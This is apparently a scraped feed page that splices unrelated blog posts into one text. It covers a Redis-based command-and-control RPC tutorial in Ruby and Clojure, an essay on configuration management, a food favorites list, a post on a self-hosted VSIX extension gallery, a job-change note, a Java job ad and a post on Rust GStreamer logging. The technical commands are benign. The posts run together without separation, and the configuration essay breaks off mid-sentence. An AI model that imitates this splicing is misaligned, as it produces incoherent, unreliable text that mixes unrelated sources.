By having reactor decoupled from the implementations of transports, codecs and the likes, testing the meat of the daemon becomes dead simple; a reactor can be started with dummy transports, stores and codecs to validate its inner workings.

I hope this gives a good overview of simple techniques for building daemons in clojure.


          Weekend project: Ghetto RPC with redis, ruby and clojure   

There’s a fair amount of things that are pretty much set on current architectures. Configuration management is handled by chef, puppet (or pallet, for the brave). Monitoring and graphing is getting better by the day thanks to products such as collectd, graphite and riemann. But one area which - at least to me - still has no obvious go-to solution is command and control.

There are a few choices which fall in two categories: ssh for-loops and pubsub based solutions. As far as ssh for loops are concerned, capistrano (ruby), fabric (python), rundeck (java) and pallet (clojure) will do the trick, while the obvious candidate in the pubsub based space is mcollective.

Mcollective has a single transport system, namely STOMP, preferably set-up over RabbitMQ. It’s a great product and I recommend checking it out, but two aspects of the solution prompted me to write a simple - albeit less featured - alternative:

  • There’s currently no other transport method than STOMP and I was reluctant to bring RabbitMQ into the already well blended technology mix in front of me.
  • The client implementation is ruby only.

So let me here engage in a bit of NIHilism and describe a redis-based approach to command and control.

The scope of the tool would be rather limited and only handle these tasks:

  • Node discovery and filtering
  • Request / response mechanism
  • Asynchronous communication (out of order replies)

Enter redis

To allow out of order replies, the protocol will need to broadcast requests and listen for replies separately. We will thus need both a pub-sub mechanism for requests and a queue for replies.

While redis is initially an in-memory key-value store with optional persistence, it offers a wide range of data structures (see the full list at http://redis.io) and pub-sub support. No explicit queue functions exist, but two operations on lists provide the same functionality.

Let’s see how this works in practice, with the standard redis client redis-cli and assuming you know how to run and connect to a redis server:

  1. Queue Example

    Here is how to push items on a queue named my_queue:

    redis 127.0.0.1:6379> LPUSH my_queue first
    (integer) 1
    redis 127.0.0.1:6379> LPUSH my_queue second
    (integer) 2
    redis 127.0.0.1:6379> LPUSH my_queue third
    (integer) 3
    

    You can now subsequently issue the following command to pop items:

    redis 127.0.0.1:6379> BRPOP my_queue 0
    1) "my_queue"
    2) "first"
    redis 127.0.0.1:6379> BRPOP my_queue 0
    1) "my_queue"
    2) "second"
    redis 127.0.0.1:6379> BRPOP my_queue 0
    1) "my_queue"
    2) "third"
    

    LPUSH as its name implies pushes items on the left (head) of a list, while BRPOP pops items from the right (tail) of a list, in a blocking manner, with a timeout argument which we set to 0, meaning that the action will block forever if no items are available for popping.

    This basic queue mechanism is the main mechanism used in several open source projects such as logstash, resque, sidekiq, and many others.

  2. Pub-Sub Example

    Pub-sub channels can be subscribed to through the SUBSCRIBE command. You'll need to open two clients; start by issuing this in the first:

    redis 127.0.0.1:6379> SUBSCRIBE my_exchange
    Reading messages... (press Ctrl-C to quit)
    1) "subscribe"
    2) "my_hub"
    3) (integer) 1
    

    You are now listening on the my_exchange exchange, issue the following in the second terminal:

    redis 127.0.0.1:6379> PUBLISH my_exchange hey
    (integer) 1
    

    You’ll now see this in the first terminal:

    1) "message"
    2) "my_hub"
    3) "hey"
    
  3. Differences between queues and pub-sub

    The pub-sub mechanism in redis broadcasts to all subscribers and will not queue up data for disconnected subscribers, whereas queues will deliver to the first available consumer, queueing up messages in the meantime (in RAM, so make sure of your consuming ability).

Designing the protocol

With these building blocks in place, a simple layered protocol can be designed around the following workflow:

  • A control box broadcasts a request with a unique ID (UUID), a command and a node specification
  • All nodes matching the specification reply immediately with a START status, indicating that the request has been acknowledged
  • All nodes refusing to go ahead reply with a NOOP status
  • Once execution is finished, nodes reply with a COMPLETE status

Acknowledgments and replies will be implemented over queues, solely to demonstrate working with queues; using pub-sub for replies would lead to cleaner code.

If we model this around JSON, we can thus work with the following payloads, starting with requests:

request = {
  reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  match: {
    all: false, /* setting to true matches all nodes */
    node_facts: {
      hostname: "www*" /* allowing simple glob(3) type matches */
    }
  },
  command: {
    provider: "uptime",
    args: { 
     averages: {
       shortterm: true,
       midterm: true,
       longterm: true
     }
    }
  }
}

START responses would then use the following format:

response = {
  in_reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  uuid: "5b4197bd-a537-4cc7-972f-d08ea5760feb",
  hostname: "www01.example.com",
  status: "start"
}

NOOP responses would drop the sequence UUID, which is not needed:

response = {
  in_reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  hostname: "www01.example.com",
  status: "noop"
}

Finally, COMPLETE responses would include the result of command execution:

response = {
  in_reply_to: "51665ac9-bab5-4995-aa80-09bc79cfb2bd",
  uuid: "5b4197bd-a537-4cc7-972f-d08ea5760feb",
  hostname: "www01.example.com",
  status: "complete",
  output: {
    exit: 0,
    time: "23:17:20",
    up: "4 days, 1:45",
    users: 6,
    load_averages: [ 0.06, 0.10, 0.13 ]
  }
}

We essentially end up with an architecture where each node is a daemon while the command and control interface acts as a client.

Securing the protocol

Since this is a proof of concept protocol and we want implementation to be as simple as possible, a somewhat acceptable compromise would be to share an SSH private key specific to command and control messages amongst nodes and sign requests and responses with it.

SSL keys would also be appropriate, but using ssh keys allows the use of the simple ssh-keygen(1) command.

Here is a stock ruby snippet which performs signing with an SSH key, given a passphrase-less key.

require 'openssl'

signature = File.open '/path/to/private-key' do |file|
  digest = OpenSSL::Digest::SHA1.digest("some text")
  OpenSSL::PKey::DSA.new(file).syssign(digest)
end

To verify a signature, here is the relevant snippet:

require 'openssl'

valid = File.open '/path/to/private-key' do |file|
  # sysverify checks the signature against the SHA1 digest, not the raw text
  digest = OpenSSL::Digest::SHA1.digest("some text")
  OpenSSL::PKey::DSA.new(file).sysverify(digest, sig)
end

This implements the common scheme of signing a SHA1 digest with a DSA key (we could just as well sign with an RSA key by using OpenSSL::PKey::RSA)

A better way of doing this would be to sign every request with the host’s private key, and let the controller look up known host keys to validate the signature.

The clojure side of things

My drive for implementing a clojure controller is integration in the command and control tool I am using to interact with a number of things.

This means I only did the work to implement the controller side of things. Reading SSH keys meant pulling in the bouncycastle libs and the apache commons-codec lib for base64:

(import '[java.security                   Signature Security KeyPair]
        '[org.bouncycastle.jce.provider   BouncyCastleProvider]
        '[org.bouncycastle.openssl        PEMReader]
        '[org.apache.commons.codec.binary Base64])
(require '[clojure.java.io :as io])

;; register the BouncyCastle provider so PEMReader can parse the key
(Security/addProvider (BouncyCastleProvider.))

(def algorithms {:dss "SHA1withDSA"
                 :rsa "SHA1withRSA"})

;; getting a public and private key from a path
(def keypair (let [pem (-> (PEMReader. (io/reader "/path/to/key")) .readObject)]
               {:public (.getPublic pem)
                :private (.getPrivate pem)}))

(def keytype :dss)

(defn sign
  [content]
  (-> (doto (Signature/getInstance (get algorithms keytype))
        (.initSign (:private keypair))
        (.update (.getBytes content)))
      (.sign)
      (Base64/encodeBase64String)))

(defn verify
  [content signature]
  (-> (doto (Signature/getInstance (get algorithms keytype))
        (.initVerify (:public keypair))
        (.update (.getBytes content)))
      (.verify (Base64/decodeBase64 signature))))

There are several options for Redis support; I used the jedis Java library, which supports everything we're interested in.
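
As a small illustration of driving jedis from Clojure - the channel and queue names mirror the hypothetical ones above, request is a payload map, and a JSON library such as cheshire is assumed bound as json:

(import '[redis.clients.jedis Jedis])

(let [conn (Jedis. "localhost")]
  ;; broadcast the request to all listening agents
  (.publish conn "amiral:requests" (json/generate-string request))
  ;; then block for up to 2 seconds waiting on the reply queue
  (.blpop conn (int 2)
          (into-array String ["amiral:replies:51665ac9-bab5-4995-aa80-09bc79cfb2bd"])))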

Wrapping up

I have early implementations of the protocol - read: with lots of room for improvement, and a few corners cut - both the agent and controller code in Ruby, and the controller code in Clojure, wrapped in my Clojure IRC bot, which might warrant another article.

The code can be found here: https://github.com/pyr/amiral (name alternatives welcome!)

If you just want to try it out, you can fetch the amiral gem in Ruby, and start an agent like so:

$ amiral.rb -k /path/to/privkey agent

You can then test querying the agent through a controller:

$ amiral.rb -k /path/to/privkey controller uptime
accepting acknowledgements for 2 seconds
got 1/1 positive acknowledgements
got 1/1 responses
phoenix.spootnik.org: 09:06:15 up 5 days, 10:48, 10 users,  load average: 0.08, 0.06, 0.05

If you’re feeling adventurous you can now start the Clojure controller; its configuration is relatively straightforward, but a bit more involved since it’s part of an IRC + HTTP bot framework:

{:transports {amiral.transport.HTTPTransport {:port 8080}
              amiral.transport.irc/create    {:host "irc.freenode.net"
                                              :channel "#mychan"}}
 :executors {amiral.executor.fleet/create    {:keytype :dss
                                              :keypath "/path/to/key"}}}

In that config we defined two ways of listening for incoming controller requests, IRC and HTTP, and we added an “executor”, i.e. a way of doing something.

You can now query your hosts through HTTP:

$ curl -XPOST -H 'Content-Type: application/json' -d '{"args":["uptime"]}' http://localhost:8080/amiral/fleet
{"count":1,
 "message":"phoenix.spootnik.org: 09:40:57 up 5 days, 11:23, 10 users,  load average: 0.15, 0.19, 0.16",
 "resps":[{"in_reply_to":"94ab9776-e201-463b-8f16-d33fbb75120f",
           "uuid":"23f508da-7c30-432b-b492-f9d77a809a2a",
           "status":"complete",
           "output":{"exit":0,
                     "time":"09:40:57",
                     "since":"5 days, 11:23",
                     "users":"10",
                     "averages":["0.15","0.19","0.16"],
                     "short":"09:40:57 up 5 days, 11:23, 10 users,  load average: 0.15, 0.19, 0.16"},
           "hostname":"phoenix.spootnik.org"}]}

Or on IRC:

09:42 < pyr> amiral: fleet uptime
09:42 < amiral> pyr: waiting 2 seconds for acks
09:43 < amiral> pyr: got 1/1 positive acknowledgement
09:43 < amiral> pyr: got 1 responses
09:43 < amiral> pyr: phoenix.spootnik.org: 09:42:57 up 5 days, 11:25, 10 users,  load average: 0.16, 0.20, 0.17

Next Steps

This was a fun experiment, but there are a few outstanding problems which will need to be addressed quickly:

  • Tests, tests, tests. This was a PoC project to start with; I should have known better and written tests along the way.
  • The queue-based reply handling makes controller logic complex and timeout handling approximate; it should be switched to pub-sub.
  • The signing should be based on known hosts’ public keys instead of the shared key used now.
  • The agent should expose more common actions: service interaction, puppet runs, etc.

          The death of the configuration file   

Taking on a new platform design recently, I thought it would be interesting to see how things have evolved in the past years in how we design and think about platform architecture.

So what do we do?

As system developers, system administrators and system engineers, what do we do?

  • We develop software
  • We design architectures
  • We configure systems

But that isn’t the purpose of our jobs; for most of us, the purpose is to generate business value. From a non-technical perspective, we generate business value by creating a system which renders one or many functions and provides insight into its operation.

And we do this by developing, logging, configuring and maintaining software across many machines.

When I started doing this - back when knowing how to write a sendmail configuration file could get you a paycheck - it all came down to setting up a few machines: a database server, a web server, a mail server, each logging locally and providing its own way of reporting metrics.

When designing custom software, you would provide reports over a local AF_UNIX socket, and configure your software by writing elegant parsers with yacc (or its GNU equivalent, bison).

When I joined the OpenBSD team, I did a lot of work on configuration files. Ask any member of the team: configuration files are a big concern, and careful attention is put into clean, human-readable and writable syntax. Additionally, all configuration files are expected to look and feel the same, for consistency.

It seems as though the current state of large applications now demands another way to interact with operating systems, and some tools are now leading the way.

So what has changed?

While our mission is still the same from a non-technical perspective, the technical landscape has evolved and gone through several phases.

  1. The first era of repeatable architecture

    We first realized that as soon as several machines performed the same task, the need for repeatable, coherent environments became essential. Typical environments used a combination of cfengine, NFS and mostly perl scripts to achieve these goals.

    Insight and reporting were then provided either by horrible proprietary kludges that I shall not name here, or by emergent tools such as netsaint (now nagios), mrtg and the like.

  2. The XML mistake

    Around that time, we started hearing more and more about XML, then touted as the solution to almost every problem. The rationale was that XML was - somewhat - easy to parse, and would allow developers to develop configuration interfaces separately from the core functionality.

    While this was a noble goal, it was mostly a huge failure. Above all, it was a victory of developers over people using their software, since they didn’t bother writing syntax parsers and let users cope with the complicated syntax.

    Another example was the difference between Linux’s iptables and OpenBSD’s pf. While the former was supposed to be the backend for a firewall handling tool that never saw the light of day, the latter provided a clean syntax.

  3. Infrastructure as code

    Fast forward a couple of years: most users of cfengine were fed up with its limitations, and architectures, while following the same logic as before, became bigger and bigger. The need for repeatable and sane environments was as important as it ever was.

    At that point in time, PXE installations were added to the mix of big infrastructures, and many people started looking at puppet as a viable alternative to cfengine.

    puppet provided a cleaner environment and allowed easier formalization of technology, platform and configuration. Philosophically though, puppet stays very close to cfengine by providing a way to configure large numbers of systems through a central repository.

    At that point, large architectures also needed command and control interfaces. As noted before, most of these were implemented as perl or shell scripts in SSH loops.

    On the monitoring and graphing front, not much was happening, nagios and cacti were almost ubiquitous, while some tools such as ganglia and collectd were making a bit of progress.

Where are we now ?

At some point recently, our applications started doing more. While for a long time the canonical dynamic web application was a busy forum, more complex sites started appearing everywhere. We were not building and operating sites anymore but applications. And while with the help of haproxy, varnish and the likes, the frontend was mostly a settled affair, complex backends demanded more work.

At the same time the advent of social enabled applications demanded much more insight into the habits of users in applications and thorough analytics.

New tools emerged to help us along the way:

  • In memory key value caches such as memcached and redis
  • Fast elastic key value stores such as cassandra
  • Distributed computing frameworks such as hadoop
  • And of course on demand virtualized instances, aka: The Cloud
  1. Some daemons only provide a small piece of functionality

    The main difference in the new backend stack is that the software components it runs are not useful on their own anymore.

    Software such as zookeeper, kafka or rabbitmq serves no other purpose than to provide supporting services in applications, and its functionality is almost only available as libraries to be used in distributed application code.

  2. Infrastructure as code is not infrastructure in code !

    What we missed along the way it seems is that even though our applications now span multiple machines and daemons provide a subset of functionality, most tools still reason with the machine as the top level abstraction.

    puppet for instance is meant to configure nodes, not clusters, and makes dependencies very hard to manage. A perfect example is the complications involved in setting up configurations dependent on other machines.

    Monitoring and graphing, except for ganglia, have long suffered from the same problem.

The new tools we need

We need to kill local configurations, plain and simple. With a simple enough library to interact with distant nodes, starting and stopping services, configuration can happen in a single place; and instead of relying on a repository-based configuration manager, configuration should happen from inside applications and not be an external process.

If this happens in a library, command & control must also be added to the mix, with centralized and tagged logging, reporting and metrics.

This is going to take some time, because it is a huge shift in the way we write software and design applications. Today, configuration management is a very complex stack of workarounds for non standardized interactions with local package management, service control and software configuration.

Today dynamically configuring bind, haproxy and nginx, installing a package on a Debian or OpenBSD, restarting a service, all these very simple tasks which we automate and operate from a central repository force us to build complex abstractions. When using puppet, chef or pallet, we write complex templates because software was meant to be configured by humans.

The same goes for checking the output of running arbitrary scripts on machines.

  1. Where we’ll be tomorrow

    With the ease PaaS solutions bring to developers, and offers such as the ones from VMWare and open initiatives such as OpenStack, it seems as though virtualized environments will very soon be found everywhere, even in private companies which will deploy such environments on their own hardware.

    I would not bet on it happening but a terse input and output format for system tools and daemons would go a long way in ensuring easy and fast interaction with configuration management and command and control software.

    While it was a mistake to try to push XML as a terse format replacing configuration files to interact with single machines, a terse format is needed to interact with many machines providing the same service, or to run many tasks in parallel - even though, admittedly, tools such as capistrano or mcollective do a good job at running things and providing sensible output.

  2. The future is now !

    Some projects are leading the way in this new orientation; 2011, as I’ve seen it called, will be the year of the time series boom. For package management and logging, Jordan Sissel released such great tools as logstash and fpm. For easy graphing and deployment, etsy released great tools, amongst them statsd.

    As for bridging the gap between provisioning, configuration management, command and control and deploys, I think two tools, both based on jclouds, are going in the right direction:

    • Whirr: lets you start a cluster through code, providing recipes for standard deploys (zookeeper, hadoop)

    • pallet: lets you describe your infrastructure as code and interact with it in your own code. pallet’s phase approach to cluster configuration provides a smooth dependency framework which allows easy description of dependencies between configuration across different clusters of machines.

  3. Who’s getting left out?

    One area where things seem to move much slower is network device configuration, for people running open source based load-balancers and firewalls, things are looking a bit nicer, but the switch landscape is a mess. As tools mostly geared towards public cloud services will make their way in private corporate environments, hopefully they’ll also get some of the programmable



          May 2017 Favorites   

May is coming to an end, which doesn't particularly please me, because I like this month - for the fresh vegetables, the spring scent in the air and the May holiday. It may not have been very warm this year, but a few summery, sunny days helped with vitamin D synthesis. I didn't discover many new products (on the other hand I had an exceptional number of treats near their best-before date to eat up - good thing I did a pantry review ;)) and maybe June will be more interesting in this respect. Apart from the products shown below, my favorites definitely include chives, parsley, asparagus, beet greens and young cabbage, and the best food is still ahead of us ;)


1. PULSIN RASPBERRY AND GOJI RAW CHOC BROWNIE

I bought these bars at Rossmann a while ago, and it's good that I took several at once, because I liked them a lot, and now I don't see them around. I liked both the dense, slightly powdery texture and the taste - moderately sweet, lightly cocoa, with a clearly noticeable addition of dried raspberries. I wouldn't really compare the bars to brownies, but I wasn't counting on that anyway, looking at the ingredient list - dates, cashews, brown rice syrup and bran, raw cacao, cocoa butter, concentrated fruit juices (apple, grape, pear), raspberry, goji, rice starch, sea salt and green tea extract don't promise the taste of cake. A 50 g bar provides 208 kcal.

2. COCONUT SUGAR (Zielony listek)

Coconut sugar is currently my favorite sweetener, adding flavor to many dishes, and the one above didn't disappoint me either. It had a slightly caramel taste (I'd rate its sweetness as marginally lower than regular sugar) and a pleasant smell. Another plus of this brand's sugar is that it is packed in two separate bags, so it stays fresh longer. I use it most often in cocoa, coffee and millet porridge, and I take some to work in a small jar in case I need to sweeten something :)

3. ORGANIC ALMONDS

Throughout May, almonds, along with other nuts, were a frequent addition to my breakfasts. The ones shown above had a natural, fresh taste and a wonderful aroma, which came out even more after a visit to the oven ;) I buy them at Tesco and recommend them, as I do this brand's other nuts and dried fruit.

4. ORGANIC DEFATTED COCOA

I usually use raw cacao, but this time I bought defatted cocoa with baking in mind, and it worked out brilliantly. The powder is aromatic, with a very rich taste and a fairly dark color.

5. BANANAS IN RAW CHOCOLATE (Cocoa)

I hadn't had this brand's bananas in a long time, but the approaching best-before date convinced me. The ones I had last time were, I think, in slightly larger pieces, but taste-wise I can't fault them. They combined the aroma of sweet dried bananas with a chewy texture and the amazing taste of raw chocolate - a truly wonderful combination. The ingredients are chocolate made of cacao beans, palm sugar and cocoa butter, plus dried bananas, all from organic farming. 100 g of the treat contains 438 kcal.

6. COCONUT WATER (Vera Farm)

I think I've already mentioned this coconut water in a favorites post, but I drank a lot of it in May, helped along by travel and a promotion at Rossmann :D I love this water for its delicious, refreshing coconut taste (to me it tastes like the water drunk straight from a young coconut), its natural ingredients and its wealth of electrolytes - it rehydrates wonderfully after exercise.

7. VEGAN TOFFEE FUDGE

I won't write at length about this fudge now, because a review will appear on the blog on Wednesday, but it deserves its place in the monthly favorites post ;)

8. BREAKFASTS

For breakfast I most often had oatmeal, as usual - cooked and baked - as well as pancakes, and sandwiches on Sundays. I usually thickened the cooked ones with vanilla pudding, and to the baked ones I most often added rhubarb, which goes deliciously with, for example, a sweet banana (I ate a lot of bananas in May in general - I really like the organic ones from Lidl) - you can find the recipe for such an oatmeal here.

9. LUNCHES

For lunch, in turn, I most often had vegetable-grain-legume mixes and soups (especially beet-greens soup with coconut milk), and once I made beet and millet patties. My dishes had no shortage of asparagus, chives, frozen green beans or broccoli, as well as the organic zucchini from Lidl - it's delicious :)


And my takeaway meals usually looked like the set shown above - they consisted of quinoa (or unroasted buckwheat groats) cooked with black beans, with olives and vegetables, hummus and tomato paste.

10. REVIEWED TREATS

I think all the products reviewed in May can count among the month's favorites. The halvas I received from Gacjana as part of a collaboration (especially the nut one) were delicious, as were the chocolates of the Spanish brand Sole and the Horizon peanut butter - probably the best peanut butter I've had so far :)


Horizon peanut butter
Sole organic chocolate with orange
Gacjana flax halvas - cranberry and nut
Sole organic chocolate with cinnamon

Did you manage to discover something good in May?

          VSIX Extension Gallery for Visual Studio   
In a [previous article](/2017/05/vs-itemtemplates-wizards-and-vsix.html) I discussed how to create Item and Project templates and bundle them into their own VSIX installers. However, now that you have your VSIX installer the question becomes how do you distribute it to all your coworkers? It would be great if they could use the _Extensions and Updates_ manager that is already built into Visual Studio. That handles installing, uninstalling, searching and auto-updating extensions. Pretty neat! However the project you have is not suitable to have in a public VSIX repository like the [Visual Studio Marketplace](https://marketplace.visualstudio.com/vs).
The public marketplace is no place for internal company extensions, unfortunately.

You need to host your own private marketplace. **But how?**

**TL;DR;** I built one.

# Private Extension Galleries

Microsoft has [addressed this issue](https://blogs.msdn.microsoft.com/visualstudio/2011/10/03/private-extension-galleries-for-the-enterprise/) but only through documentation. There are no concrete implementations available, from Microsoft nor any others, on how to host and serve these files. Neither is there a simple way to leverage the advanced features the Extension Manager provides (such as search, ratings and download counts).

## So what is available?

Unfortunately the commercial offerings are incredibly limited. The main one, [myget.org](https://www.myget.org), is purely online and regretfully not free. The popular [Nexus Repository](https://www.sonatype.com/nexus-repository-oss) by Sonatype dropped support for VSIX files in their latest version (v3). There are some [half-automated](https://github.com/garrettpauls/VSGallery.AtomGenerator) solutions out there, others [very manual](https://www.codeproject.com/Articles/881890/Your-Private-Extension-Gallery). The worst thing about most of the automatic offerings is that they require being run on an [existing webserver](http://blog.ehn.nu/2012/11/using-private-extension-galleries-in-visual-studio-2012/) (IIS, Apache, Nginx, etc) and require a relational database system to store data.

So there really is no freely available out-of-the-box solution. **Until now...**

# Introducing vsgallery
The VS-Gallery running inside of Visual Studio's Extension Manager

With the current rise in popularity of [_the Microservice_](https://en.wikipedia.org/wiki/Microservices) I found it really disappointing that a simple click-to-run solution wasn't available to run a private Visual Studio Marketplace. I wanted something simple and self-contained that could be run without installing and configuring multiple other systems (such as a webserver and a database system).

## The VS Gallery solution

Before I bore you with more text, go ahead and test [_vsgallery_](https://github.com/sverrirs/vsgallery) out. Just download the latest release and run the executable file. It is really that super simple. I promise!

**vsgallery** is a single executable file which acts as a complete self-hosted extension gallery for Visual Studio 2010 and newer. It really is ultra simple to configure and run. You are up and running in a few seconds. All for the low low price of **FREE**!

The whole system runs as a single self-contained executable and uses no database. All files and data are stored on the local file system, which makes maintenance and backup super simple.
## Features

* Fully featured Extension Gallery ready to use in Microsoft Visual Studio.
* Counts downloads of extensions
* Displays star ratings, release notes and links to project home pages
* Offers a simple to use REST API to submit ratings and upload new VSIX packages
* Atom and JSON feeds for available packages
* It's FREE!

# How to install into Visual Studio

In Visual Studio

```
Tools > Options > Environment > Extensions and Updates
```

Add a new entry and copy in the URL of the main Microservice Atom Feed.

> By default the URL is `http://YOUR_SERVER:5100/feeds/atom.xml`
Please consult [this MSDN document](https://msdn.microsoft.com/en-us/library/hh266746.aspx) for any further details and alternative options on how to install a Private Extension Gallery in Visual Studio.

# How it works

The microservice is configured via the `config.ini` file that sits in the same folder as the main executable. The `.vsix` files, along with their download counts and ratings data, are stored in a subfolder of the main service executable, `VsixStorage/` (this subfolder is configurable). This makes taking backups and moving the service between machines super easy, as the root folder contains the entire Microservice state and data.

```
root-folder
|--vsgallery.exe
|--config.ini
|--VsixStorage
   |--atom.xml
   |--First.vsix
   |--Second.vsix
   |--AndSoForth.vsix
```

# The vsgallery API

The Microservice comes with a rich HTTP based API. You can plug the data and its functionality directly into your development portal or company intranet with minimal web programming. Even direct integration into your continuous integration platforms and communication pipelines such as #slack are possible.

> The `vsix_id` required by many of the endpoints can be obtained by reading the `id` field in the feed endpoints.

### [GET] /feeds/atom.xml

This is the main entry point for the VSIX feed and serves up the Syndicate-Feed compatible Atom file containing all available extensions on the server. **This is the URL endpoint that should be used in Visual Studio.** See [How to install into Visual Studio](#how-to-install) for more information.

### [GET] /api/ratings/{vsix_id}

Retrieves the rating value and vote count for a particular VSIX package by its ID.

```
curl -X GET http://VSGALLERY_SERVER:5100/api/ratings/VSIX_ID
```

The return type is the following JSON

```
{
  "rating": 4.3,
  "count": 19
}
```

### [POST/PUT] /api/ratings/{vsix_id}

Submits rating values for a particular VSIX package by its ID. The post payload should be just a raw string containing a single floating point value in the range [0.0, 5.0]. The example below will post a rating of `3.5` stars to the VSIX package with the id `VSIX_ID`

```
curl -X POST -H "Content-Type: text/plain" --data "3.5" http://VSGALLERY_SERVER:5100/api/ratings/VSIX_ID
```

### [GET] /api/json

JSON feed for the entire package catalog. Same data that is being fed through the atom feed, but in a handier JSON format.

### [POST/PUT] /api/upload

This endpoint accepts form-data uploads of one or more .vsix files to the hosting service. The example below will upload the file `my.vsix` to the gallery server and propose a new name for it, `renamed.vsix` (you can omit the filename param to use the original name)

```
curl -X POST --form "file=@my.vsix;filename=renamed.vsix" http://VSGALLERY_SERVER:5100/api/upload
```

To upload multiple files simply add more form elements. The example below uploads two VSIX files at the same time.

```
curl -X POST --form "file1=@my.vsix" --form "file1=@your.vsix" http://VSGALLERY_SERVER:5100/api/upload
```

# Closing

So if you're searching for a simple solution for your internal, low traffic, extension gallery then please consider **vsgallery**. If you do try it out, please leave me feedback in the comments below. Peace!
          New Job   

I mentioned in my last post that I was learning Perl in the hopes of landing a job. Well, that has now paid off as I will be starting at Summersault next week. I’m pretty excited to get out of working with Microsoft tools. I was worried about getting pigeonholed into that if I took another job with it. While C# is a great language, my moral objections to Microsoft’s business practices far outweigh my love of C#. Now I get to work with a variation of the LAMP stack (FreeBSD, Apache, PostgreSQL, and Perl) as part of a small team. And other people can actually see my work this time. That was sometimes frustrating when writing internal web apps.

This change may affect my open source work with Trac. Summersault does not use it internally (RT seems to be the standard with Perl). Up until now LSR’s use of it was a major motivator for me to get involved. We will see if I am able to sustain interest when I am not using it on a daily basis. If not, I will put out a call for someone to adopt the batch modify plugin. The whiteboard plugin will probably just die. I can’t see anybody else wanting to put the necessary work into it.


          Application Development Team - (Holyoke)   
Application Development Team

GRT Corporation is looking for three Java/Oracle specialists to deliver a web based application for its client located in Holyoke, MA.

Highly experienced Software Developer and Architect - to assist in the design of a next generation web application offering.
Two Web Application Developers - to develop and support all external/internal web related software and applications.
W2 tax term is required for all positions.

Responsibilities
Architect - architect, design, and code using Spring and other open source technologies while investigating existing and new technologies to build new features and integration points.
Developers - code and support external/internal web related software and applications while assisting with the development of test conditions and scenarios. Collaborate with other team members to implement application features, including user interface & business functionality.

Qualifications
B.S. degree in Computer Science, or equivalent
Minimum of 5+ years software development experience
Experience with the UNIX operating system, services, and commands
Experience with J2EE, Hibernate, Spring and Struts
Experience with modern front-end JavaScript libraries (jQuery)
Experience with REST/JSON APIs
Experience with application servers such as Apache Tomcat, JBoss EAP 6.x
Hands-on experience with JAX-RS, JAXB, JMS, Spring 4
Strong experience in JUnit, Mockito, Spring-Test and automated testing in general is a MUST
Experience creating/consuming Web services
Experience with testing frameworks
Strong experience working with databases - PL/SQL
Demonstrates integrity and authenticity

Additional Qualifications
Architect: experience in agile methodology; 5-10+ years' experience writing robust web applications with the Spring Framework (Spring Boot, Spring Security, Spring MVC, etc.) using Java; familiarity with the GIT and CVS source code management tools.
Developer 1: Java frameworks, especially microservice architecture; Java framework and messaging architecture.
Developer 2: experience with the SalesForce API; strong experience in Enterprise Application Integration patterns (EAI).

If you are interested, please apply indicating the position you are applying for, your current/desired compensation, a daytime phone number and your authorization status.

thomas.simpson@grtcorp.com

Regards,
Thomas Simpson
HR Specialist
GRT Corporation
Stamford, CT 06901
          Sebastian Dröge: Writing GStreamer Elements in Rust (Part 4): Logging, COWs and Plugins   

This is part 4, the older parts can be found here: part 1, part 2 and part 3

It’s been quite a while since the last update again, so I thought I should write about the biggest changes since last time again even if they’re mostly refactoring. They nonetheless show how Rust is a good match for writing GStreamer plugins.

Apart from actual code changes, the code was also relicensed from the LGPL-2 to a dual MIT-X11/Apache2 license, to make everybody’s life a bit easier with regard to static linking and building new GStreamer plugins on top of this.

I’ll also speak about all this and more at RustFest.EU 2017 in Kiev on the 30th of April, together with Luis.

The next steps after all this will be to finally make the FLV demuxer feature-complete, for which all the base-work is already done now.

Logging

One thing that was missing so far and made debugging problems always a bit annoying was the missing integration with the GStreamer logging infrastructure. Adding println!() everywhere just to remove them again later gets boring after a while.

The GStreamer logging infrastructure is based, like many other solutions, on categories in which you log your messages and levels that describe the importance of the message (error, warning, info, …). Logging can be disabled at compile time, up to a specific level, and can also be enabled/disabled at runtime for each category to a specific level, and performance impact for disabled logging should be close to zero. This now has to be mapped somehow to Rust.

During last year’s “24 days of Rust” in December, slog was introduced (see this also for some overview of how slog is used). And it seems like the perfect match here, due to the ability to implement new “output backends” (called a Drain in slog) and its very low performance impact. So how logging works now is that you create a Drain per GStreamer debug category (which will then create the category if needed), and all logging to that Drain goes directly to GStreamer:

// The None parameter is a GStreamer Element, which allows the logging system to
// print the element name and other things on the GStreamer side
// The 0 is for defining a color for the logging in that category
let logger = Logger::root(GstDebugDrain::new(None,
                                             "mycategory",
                                             0,
                                             "Some description"),
                                             None);
debug!(logger, "Some output with a number {}", 1);

With lazy_static we can then make sure that the Drain is only created once and can be used from multiple places.
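
For illustration, a minimal sketch of that with lazy_static, reusing the Logger and GstDebugDrain from the snippet above (the category name is the same made-up one):

#[macro_use]
extern crate lazy_static;

lazy_static! {
    // Created once on first use, shared by every call site afterwards
    static ref LOGGER: Logger = Logger::root(GstDebugDrain::new(None,
                                                                "mycategory",
                                                                0,
                                                                "Some description"),
                                             None);
}

fn process() {
    debug!(LOGGER, "Processing buffer number {}", 42);
}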

All the implementation for the Drain can be found here, and it’s all rather straightforward plumbing. The interesting part here however is that slog makes sure that the message string and all its formatting arguments (the integer in the above example) are passed down to the Drain without doing any formatting. As such we can skip the whole formatting step if the category is not enabled or its level is too low, which gives us almost zero-cost logging for the cases when it is disabled. And of course slog also allows disabling logging up to a specific level at compile time via cargo’s features feature, making it really zero-cost if disabled at compile time.

Safe & simple Copy-On-Write

In GStreamer, buffers and similar objects are inheriting from a base class called GstMiniObject. This base class provides infrastructure for reference counting, copying (cloning) of the objects and a dynamic (at runtime, not to be confused with Rust’s COW type) Copy-On-Write mechanism (writable access requires a reference count of 1, or a copy has to be made). This is very similar to Rust’s Arc, which for a contained type that implements Clone provides the make_mut() and get_mut() functions that work the same way.

Now we can’t unfortunately use Arc directly here for wrapping the GStreamer types, as the reference counting is already done inside GStreamer and adding a second layer of reference counting on top is not going to make things work better. So there’s now a GstRc, which provides more or less the same API as Arc and wraps structs that implement the GstMiniObject trait. The latter provides GstRc with functions for getting the raw pointer, swapping the raw pointer and creating new instances from a raw pointer. The actual structs for buffers and other types don’t do any reference counting or other instance handling, and only have unsafe constructors. The general idea here is that they will never exist outside a GstRc, which can then provide you with (mutable or not) references to them.

